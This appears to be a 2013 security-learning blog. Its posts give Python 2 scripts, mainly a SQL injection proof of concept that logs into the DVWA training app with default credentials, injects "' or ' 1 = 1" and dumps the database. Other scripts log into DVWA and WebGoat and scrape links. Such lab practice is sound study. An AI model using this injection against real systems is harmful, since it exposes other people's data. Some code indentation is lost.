Sunday, February 24, 2013

SQLi with Python and DVWA: article 201304

Continuing on with my studies and practice of Python with the help of SecurityTube's SPSE course I am presenting below a Proof of Concept script for SQL Injection. They script is written in Python 2.7 and uses Mecahnize along with BeautifulSoup.  I ran the script against OWASP's Damn Vulnerable Web Application found on the Broken Web Apps VM.  I have commented the script the make it is self explanatory as possible

Here is a screen shot of the output:



Here is the script:

#!/usr/bin/python

#Bringing in mechanize and beautiful soup.  These are  installed separately from Python
import mechanize
from bs4 import BeautifulSoup

#Building the SQL injection
hotSQLinjection = "' or ' 1 = 1"

#Creating a mechanize browser
browser = mechanize.Browser()

#Opening my URI to the DVWA web page obviously your location will most likely vary
browser.open("http://192.168.1.152/dvwa")

#Printing to browser title to show where I am
print "#" *55
print "# " + browser.title()
print "#" *55 + "\n"

#There is only one form on this page so I jump right in
browser.select_form(nr=0)


#Below I am filling out the form fields and submitting for log in
browser.form['username'] = 'admin'
browser.form['password'] = 'admin'
browser.submit()

#Again printing the browser title to show where I am
print "#" *55
print "# " + browser.title()
print "#" *55

#Now that I am authenticated I am opening the browser to the SQL Injection page
browser.open("http://192.168.1.152/dvwa/vulnerabilities/sqli")

#Again there is only one form so I am so I will jump right in

#Printing out what the SQLi is
print "\n"
print "#" *55
print "# " + " The SQL Injection that will be used is: " + hotSQLinjection
print "# " + " Injecting now"
print "#" *55

#Inserting the SQL Injection into the form filed and submitting
browser.select_form(nr=0)
browser.form['id'] = hotSQLinjection
browser.submit()

#This feeds the the browser page into a variable to feed into the BeautifulSoup parser
page1 =  browser.response().read()

#As it says!
print "\n"
print "#" *55
print "# " + " Feeding page into BeautifulSoup LXML Parser"
print "#" *55

soup1 = BeautifulSoup(page1, "lxml")

#The "sensitive" info from the injection is surrounded by
 tags
#This creates a list to iterate though
allPRE =  soup1.find_all('pre')

#Printing out the "sensitve" information from the DVWA database
print "\n"
print "#" *55
print "# " + " Dump of database"
print "#" *55

#Iterating through the list
for pre in allPRE:
    print pre

#All done
print "\n"
print "#" *55
print "# " + " Injection and dump complete"
print "#" *55
print "\n"

Saturday, February 23, 2013

Python Script to Log Into DVWA: article 201303

Very similar to my last post this is just a simple script using Python with Mechanize to log into Damn Vulnerable Web App from OWASP.

Here is the script:

#!/usr/bin/python

import mechanize

browser = mechanize.Browser()

browser.open("http://192.168.1.152/dvwa")
print "#" *50
print "# " + browser.title()
print "#" *50 + "\n"

# There is only one form on this page so I jump right in

browser.select_form(nr=0)

#below I am filling out the form fields and submitting
browser.form['username'] = 'admin'
browser.form['password'] = 'admin'
browser.submit()

print "#" *50
print "# " + browser.title()
print "#" *50

Here is a screen shot of the output.  Notice I print the title of the "Log In" page and once credentials are submitted the I print the title of the "Welcome" page.

.




.

Friday, February 15, 2013

Python Script to Connect to and Start Web Goat: article 201302

This is a simple script that uses Mechanize to connect to Web Goat, Log In, and Start Web Goat

If you want to connect to Web Goat remotely will need to modify the server_80.xml file (or server_8080.xml based on your config) to allow remote connections. DOING THIS INCREASES RISK TO YOUR SYSTEM.
To modify the xml file navigate to your Web Goat folder. In my case
    P:\WebGoat-5.4-OWASP_Standard_Win32\WebGoat-5.4\tomcat\conf
Select the appropriate file for editing; in my case server_80.xml.  Change the line:
   
to:
   
Start the Web Goat listener.
I ran the below script from one system to connect to the system where Web Goat was listening.

#!/usr/bin/python


import mechanize

browser = mechanize.Browser()

browser.add_password("http://192.168.1.14/WebGoat/attack", "guest", "guest")

browser.open('http://192.168.1.14/WebGoat/attack')

for form in browser.forms():
print "form is: ", form

browser.select_form(nr=0)

browser.submit()

for link in browser.links():
print link.text + ' : ' + link.url

Of course the IP address of where your Web Goat will most likely vary.  So what is going on in the above is:
1. I imported mechanize (this needs to be installed onto your system)
2. I created a browser instance
3. I added the default username and password of Web Goat to browser instance 'guest' and 'guest'
4. I opened a session with the Web Goat listener
5. I print the available forms (there really is no need to do this)
6. I select the form (there is only one on this page)
7. I submit the form
8. I print the links' text and url's just to verify that I have successfully logged in and started the Web Goat

Next steps for me to practice are attacking Web Goat with Mechanize.
.

Sunday, February 10, 2013

Link Scraper using Python: article 201301


As part of the SecurityTube Python Scripting Expert course the below is a simple script written to extract the absolute paths from a provided webpage.

Written in Python 2.7.2 using urllib, re, and Beautiful Soup 4 using the LXML parser.

Here is screen shot of an example:




And here is the code:

#!/usr/bin/python

import re
import urllib
from bs4 import BeautifulSoup

print "#" * 50
print "#    Enter a url in the format http://site.domain"
print "#    i.e http://whyjoseph.com"
url = raw_input("#    Enter a URL: ")
print "#" *50
print "\n"
print ">>>>  Retrieving and parsing the page. This could take several seconds. <<<<"
print "\n"
htmlPage = urllib.urlopen(url)

soup = BeautifulSoup(htmlPage, 'lxml')

allLinks = soup.find_all('a')

for i in allLinks:
link = (i.get('href'))
if link:
matchobj = re.search('HTTP', link, re.I)
if matchobj:
print link

print "\n"


.